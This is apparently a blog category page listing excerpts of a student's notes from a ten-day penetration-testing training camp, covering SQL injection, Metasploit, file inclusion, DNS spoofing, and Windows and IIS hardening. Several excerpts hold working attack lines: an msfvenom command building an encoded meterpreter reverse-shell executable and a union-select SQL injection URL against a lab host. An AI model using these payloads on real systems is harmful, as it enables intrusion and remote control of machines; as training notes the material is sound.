网络安全
文章平均质量分 72
mingC0758
技术沉淀中..
展开
-
蓝盾实训营day1——配置渗透环境和SQL注入
蓝盾实训营day1——配置渗透环境和SQL注入有幸参加了蓝盾在学校办的10天的实训营,把过程笔记发到这里,希望可以分享给更多的人。黑客是如何入侵的踩点 whois扫描 nmap提权破坏后门搜索网络设备shodan.io 远程摄像头…… 搜索jaws/1.0 country:”CN”windows服务器不开源收费nma...原创 2018-07-09 23:41:45 · 820 阅读 · 0 评论 -
蓝盾实训营day5——windows主机渗透、kali-metasploit、melody木马
目录:目标扫描漏洞扫描漏洞利用提权留后门环境:windows xp sp2 (ms08_067漏洞利用)kali linux 2.0(配置好Nessus环境)原创 2018-07-13 15:05:39 · 890 阅读 · 0 评论 -
蓝盾实训营day9——Windows主机安全加固和Android木马生成
Windows主机安全加固禁用guest账户设置账户锁定策略设置Administrator不允许终端登陆使用注册表更改远程桌面监听的端口用netstat -an 查看端口打开情况,关闭不必要的端口关闭自动播放,防止U盘插入后病毒自动运行 7. ...原创 2018-07-19 15:28:26 · 478 阅读 · 0 评论 -
蓝盾实训营day8——IIS安全加固与证书签发
网站安全狗(IIS版)安全狗一般有以下功能:防止流量攻击防止SQL注入文件上传防护防止一句话木马的执行开启安全狗的防护功能: 对网站进行SQL注入测试: 显示请求被拦截。回到安全狗,查看防护日志: 用菜刀连接一句话木马的时候会被拦截: Windows防火墙开启防火墙后,所有外部连接都会被拒绝。可以通过添加例外-端口,来开放某个端口供外部...原创 2018-07-18 16:00:38 · 734 阅读 · 0 评论 -
蓝盾实训营day4——文件包含漏洞
解决VMware用NAT模式无法上网的问题是因为本机的VMware的某些服务没有打开,右键计算机,点击“管理”,选择服务,打开VMware开头的服务,就可以使用NAT模式了。这个模式将本机和虚拟机连成一个局域网,这样就不会影响到外部网了。文件包含漏洞原理:php的include或者require可以引入外部文件。 PHP文件包含的几个函数:include():只有代码...原创 2018-07-12 09:38:39 · 374 阅读 · 0 评论 -
蓝盾实训营day3——文件上传、SQL注入进阶
cookie欺骗原理:把登陆后的cookie保存下来,在其他地方访问页面时携带这个cookie..https可能做不了这个实验HTTP Cookie 设置了secure , 该cookie只能在HTTPS通道下被写入浏览器。HTTPS Cookie 设置了secure , 该cookie只能在HTTPS通道下被写入浏览器。HTTP Cookie ...原创 2018-07-11 16:24:32 · 1068 阅读 · 0 评论 -
蓝盾实训营day2——使用Kali ettercap进行DNS欺骗
蓝盾实训2XSS可以直接百度,比较简单;arp欺骗和dns欺骗是用kali linux下的ettercap实现的,可以百度一下这个工具的使用。由于在上课的时候用的是有道云笔记写的..图片上传比较麻烦,所以这篇博文没有示例图片。之后的博文我尽量在csdn上编辑,就可以上传一些操作过程的图片了。arp欺骗原理ARP协议的功能是通过目标设备的IP地址,查询目标设备的MAC地址。每...原创 2018-07-10 22:45:06 · 1425 阅读 · 0 评论 -
蓝盾实训营day7——meterpreter木马生成和利用
meterpreter木马生成和利用木马生成msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.188.5 lport=5555 -f exe > shell.exe lhost 本地ip lport 本地端口命令完成后,会在当前目录下生成一个...原创 2018-07-17 10:04:59 · 1136 阅读 · 0 评论 -
蓝盾实训营day6——日志查看和木马清除
开启服务器日志和木马清除开启服务器日志和木马清除根据应用服务器的不同,有不同的日志开启方法,具体方法直接百度就行,比较简单。开启日志之后,用web扫描工具对网站进行扫描,利用文件上传漏洞进行挂马,然后我们可以查看日志,如果发现有未知页面被客户端访问,则可能发生了挂马行为,查找服务器有没有该木马文件,有就删掉。apache-php开启日志方法 打开文件: Apa...原创 2018-07-16 10:19:01 · 980 阅读 · 0 评论 -
蓝盾实训营day10——Web渗透实战
扫描SQL注入开放了80端口,直接用浏览器访问靶机的网站,发现有SQL注入点: payloadhttp://192.168.188.150/index.php?s=/news/6) and 1=2 union select 1,database(),3,4,5,6,version()--最终得到数据库账号密码: 这里用的是base64加密,可以直接解密成明...原创 2018-07-20 16:57:06 · 902 阅读 · 0 评论